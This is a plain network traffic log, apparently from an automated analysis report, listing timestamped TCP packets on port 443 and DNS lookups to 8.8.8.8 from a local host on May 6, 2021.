May 6, 2021 17:58:14.387890100 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.387907028 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.387932062 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.387955904 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.387954950 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.387983084 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.387995005 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.388008118 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388034105 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388051987 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.388061047 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388087988 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388097048 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.388114929 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388147116 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.388149977 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388163090 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388178110 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388206005 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388226032 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.388232946 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388258934 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388258934 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.388283014 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388302088 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.388309956 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388339043 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.388339996 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388367891 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388389111 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.388392925 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388420105 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388444901 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.388448000 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388473034 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388498068 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388499022 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.388524055 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388550043 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.388551950 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388580084 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388602972 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.388603926 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388631105 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388649940 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.388653040 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388679981 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388700962 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.388706923 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388735056 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388757944 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.388765097 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388793945 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388816118 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.388818979 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388845921 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388868093 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.388870955 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388896942 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388919115 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.388921022 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.388963938 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.394731045 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.576486111 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.576519966 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.576544046 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.576565981 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.576569080 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.576595068 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.576620102 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.576620102 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.576647997 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.576664925 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.576672077 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.576697111 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.576720953 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.576724052 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.576746941 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.576766014 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.576773882 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.576798916 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.576824903 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.576838017 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.576852083 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.576864958 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.576874018 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.576899052 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.576917887 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.576921940 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.576948881 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.576961040 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.576975107 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.576992035 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577014923 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.577017069 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577042103 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577059031 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.577065945 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577092886 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577115059 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.577119112 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577142954 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577168941 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577187061 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.577191114 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577218056 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577228069 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.577243090 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577266932 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577270985 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.577291012 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577315092 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577322960 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.577338934 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577364922 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577397108 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.577415943 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.577419043 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577445984 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577471018 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577488899 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.577495098 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577518940 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577548981 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577567101 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.577574015 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577596903 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577613115 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.577620983 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577646971 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577651024 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.577673912 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577697992 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577708006 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.577723026 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577743053 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.577749968 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577779055 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577801943 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577801943 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.577827930 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577855110 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577861071 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.577883005 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577908993 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577910900 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.577934980 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.577959061 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.582425117 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.582458019 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.582485914 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.582510948 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.582515955 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.582540035 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.582540989 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.582564116 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.582590103 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.582614899 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.582617044 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.582626104 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.582643986 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.582669020 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.582679033 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.582695007 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.582720995 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.582737923 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.582751989 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.582762003 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.582772970 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.582789898 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.582817078 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.582839966 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.582843065 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.582868099 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.582884073 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.582891941 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.582917929 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.582931042 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.582942963 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.582968950 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.582990885 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.582998037 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.583023071 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.583045959 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.583050013 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.583071947 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.583097935 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.583106041 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.583122969 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.583143950 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.583146095 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.583169937 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.583183050 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.583195925 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.583220959 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.583237886 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.583241940 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.583264112 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.583287001 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.583287954 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.583313942 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.583336115 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.583343029 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.583358049 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.583379984 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.583388090 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.583415985 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.583441973 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.583446026 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.583467960 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.583484888 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.583492994 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.583517075 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.583534002 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.583539009 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.583576918 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.583842039 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.765443087 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.765494108 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.765527010 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.765558004 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.765589952 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.765625954 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.765634060 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.765947104 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.765973091 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.766000986 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.766026020 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.766026974 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.766073942 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.790492058 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.790750980 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.978359938 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.978374958 CEST	443	49735	50.87.249.219	192.168.2.3
May 6, 2021 17:58:14.978461027 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:14.981821060 CEST	49735	443	192.168.2.3	50.87.249.219
May 6, 2021 17:58:21.949469090 CEST	443	49734	35.181.18.61	192.168.2.3
May 6, 2021 17:58:21.951221943 CEST	49734	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:22.253724098 CEST	443	49733	35.181.18.61	192.168.2.3
May 6, 2021 17:58:22.253899097 CEST	49733	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:32.189452887 CEST	443	49734	35.181.18.61	192.168.2.3
May 6, 2021 17:58:32.189563990 CEST	49734	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:32.494785070 CEST	443	49733	35.181.18.61	192.168.2.3
May 6, 2021 17:58:32.494918108 CEST	49733	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:41.747704983 CEST	443	49734	35.181.18.61	192.168.2.3
May 6, 2021 17:58:41.747910023 CEST	49734	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:41.876735926 CEST	443	49733	35.181.18.61	192.168.2.3
May 6, 2021 17:58:41.877176046 CEST	49733	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:42.117506981 CEST	443	49736	34.202.206.65	192.168.2.3
May 6, 2021 17:58:42.117542028 CEST	443	49736	34.202.206.65	192.168.2.3
May 6, 2021 17:58:42.117561102 CEST	443	49736	34.202.206.65	192.168.2.3
May 6, 2021 17:58:42.117697954 CEST	49736	443	192.168.2.3	34.202.206.65
May 6, 2021 17:58:42.117904902 CEST	49736	443	192.168.2.3	34.202.206.65
May 6, 2021 17:58:42.251291037 CEST	443	49736	34.202.206.65	192.168.2.3
May 6, 2021 17:58:42.267054081 CEST	443	49737	34.202.206.65	192.168.2.3
May 6, 2021 17:58:42.267097950 CEST	443	49737	34.202.206.65	192.168.2.3
May 6, 2021 17:58:42.267117977 CEST	443	49737	34.202.206.65	192.168.2.3
May 6, 2021 17:58:42.267271042 CEST	49737	443	192.168.2.3	34.202.206.65
May 6, 2021 17:58:42.267535925 CEST	49737	443	192.168.2.3	34.202.206.65
May 6, 2021 17:58:42.401957035 CEST	443	49737	34.202.206.65	192.168.2.3
May 6, 2021 17:58:46.747906923 CEST	443	49734	35.181.18.61	192.168.2.3
May 6, 2021 17:58:46.748047113 CEST	49734	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:46.876843929 CEST	443	49733	35.181.18.61	192.168.2.3
May 6, 2021 17:58:46.876997948 CEST	49733	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:47.748491049 CEST	443	49734	35.181.18.61	192.168.2.3
May 6, 2021 17:58:47.748521090 CEST	443	49734	35.181.18.61	192.168.2.3
May 6, 2021 17:58:47.748567104 CEST	49734	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:47.748609066 CEST	49734	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:47.748797894 CEST	49734	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:47.798732042 CEST	443	49734	35.181.18.61	192.168.2.3
May 6, 2021 17:58:47.877408028 CEST	443	49733	35.181.18.61	192.168.2.3
May 6, 2021 17:58:47.877443075 CEST	443	49733	35.181.18.61	192.168.2.3
May 6, 2021 17:58:47.877490997 CEST	49733	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:47.877522945 CEST	49733	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:47.878720999 CEST	49733	443	192.168.2.3	35.181.18.61
May 6, 2021 17:58:47.929702997 CEST	443	49733	35.181.18.61	192.168.2.3
May 6, 2021 17:59:57.800173044 CEST	49732	443	192.168.2.3	143.204.209.88
May 6, 2021 17:59:57.800240993 CEST	49731	443	192.168.2.3	143.204.209.88
May 6, 2021 17:59:57.800319910 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:59:57.800381899 CEST	49729	443	192.168.2.3	143.204.209.31
May 6, 2021 17:59:57.802366972 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:59:57.802454948 CEST	49723	443	192.168.2.3	143.204.209.41
May 6, 2021 17:59:57.841231108 CEST	443	49731	143.204.209.88	192.168.2.3
May 6, 2021 17:59:57.841255903 CEST	443	49732	143.204.209.88	192.168.2.3
May 6, 2021 17:59:57.841308117 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:59:57.841393948 CEST	49731	443	192.168.2.3	143.204.209.88
May 6, 2021 17:59:57.841444016 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:59:57.841478109 CEST	49732	443	192.168.2.3	143.204.209.88
May 6, 2021 17:59:57.841758013 CEST	443	49729	143.204.209.31	192.168.2.3
May 6, 2021 17:59:57.841880083 CEST	49729	443	192.168.2.3	143.204.209.31
May 6, 2021 17:59:57.843283892 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:59:57.843350887 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:59:57.843358040 CEST	443	49723	143.204.209.41	192.168.2.3
May 6, 2021 17:59:57.843471050 CEST	49723	443	192.168.2.3	143.204.209.41

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 6, 2021 17:57:55.181878090 CEST	49199	53	192.168.2.3	8.8.8.8
May 6, 2021 17:57:55.233568907 CEST	53	49199	8.8.8.8	192.168.2.3
May 6, 2021 17:57:55.949901104 CEST	50620	53	192.168.2.3	8.8.8.8
May 6, 2021 17:57:56.001481056 CEST	53	50620	8.8.8.8	192.168.2.3
May 6, 2021 17:57:57.212723970 CEST	64938	53	192.168.2.3	8.8.8.8
May 6, 2021 17:57:57.271400928 CEST	53	64938	8.8.8.8	192.168.2.3
May 6, 2021 17:57:57.948456049 CEST	60152	53	192.168.2.3	8.8.8.8
May 6, 2021 17:57:57.997623920 CEST	53	60152	8.8.8.8	192.168.2.3
May 6, 2021 17:57:59.233021021 CEST	57544	53	192.168.2.3	8.8.8.8
May 6, 2021 17:57:59.284694910 CEST	53	57544	8.8.8.8	192.168.2.3
May 6, 2021 17:58:01.201263905 CEST	55984	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:01.253571987 CEST	53	55984	8.8.8.8	192.168.2.3
May 6, 2021 17:58:02.202861071 CEST	64185	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:02.251815081 CEST	53	64185	8.8.8.8	192.168.2.3
May 6, 2021 17:58:03.647974968 CEST	65110	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:03.696922064 CEST	53	65110	8.8.8.8	192.168.2.3
May 6, 2021 17:58:05.065756083 CEST	58361	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:05.117496014 CEST	53	58361	8.8.8.8	192.168.2.3
May 6, 2021 17:58:06.832200050 CEST	63492	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:06.867396116 CEST	60831	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:06.891011000 CEST	53	63492	8.8.8.8	192.168.2.3
May 6, 2021 17:58:06.925057888 CEST	60100	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:06.930119991 CEST	53	60831	8.8.8.8	192.168.2.3
May 6, 2021 17:58:06.975560904 CEST	53	60100	8.8.8.8	192.168.2.3
May 6, 2021 17:58:08.093818903 CEST	53195	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:08.155834913 CEST	53	53195	8.8.8.8	192.168.2.3
May 6, 2021 17:58:08.608974934 CEST	50141	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:08.675712109 CEST	53	50141	8.8.8.8	192.168.2.3
May 6, 2021 17:58:08.988668919 CEST	53023	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:09.048226118 CEST	53	53023	8.8.8.8	192.168.2.3
May 6, 2021 17:58:09.437083006 CEST	49563	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:09.500181913 CEST	53	49563	8.8.8.8	192.168.2.3
May 6, 2021 17:58:09.513976097 CEST	51352	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:09.562781096 CEST	53	51352	8.8.8.8	192.168.2.3
May 6, 2021 17:58:09.888776064 CEST	59349	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:09.947135925 CEST	53	59349	8.8.8.8	192.168.2.3
May 6, 2021 17:58:10.436538935 CEST	57084	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:10.498418093 CEST	53	57084	8.8.8.8	192.168.2.3
May 6, 2021 17:58:10.650891066 CEST	58823	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:10.661113024 CEST	57568	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:10.719474077 CEST	53	57568	8.8.8.8	192.168.2.3
May 6, 2021 17:58:10.731818914 CEST	53	58823	8.8.8.8	192.168.2.3
May 6, 2021 17:58:10.954509974 CEST	50540	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:11.014482021 CEST	53	50540	8.8.8.8	192.168.2.3
May 6, 2021 17:58:11.274234056 CEST	54366	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:11.339565992 CEST	53	54366	8.8.8.8	192.168.2.3
May 6, 2021 17:58:11.522727966 CEST	53034	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:11.579546928 CEST	57762	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:11.641833067 CEST	53	57762	8.8.8.8	192.168.2.3
May 6, 2021 17:58:11.727689028 CEST	53	53034	8.8.8.8	192.168.2.3
May 6, 2021 17:58:11.787964106 CEST	55435	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:11.836374998 CEST	50713	53	192.168.2.3	8.8.8.8
May 6, 2021 17:58:11.845249891 CEST	53	55435	8.8.8.8	192.168.2.3
May 6, 2021 17:58:11.885557890 CEST	53	50713	8.8.8.8	192.168.2.3
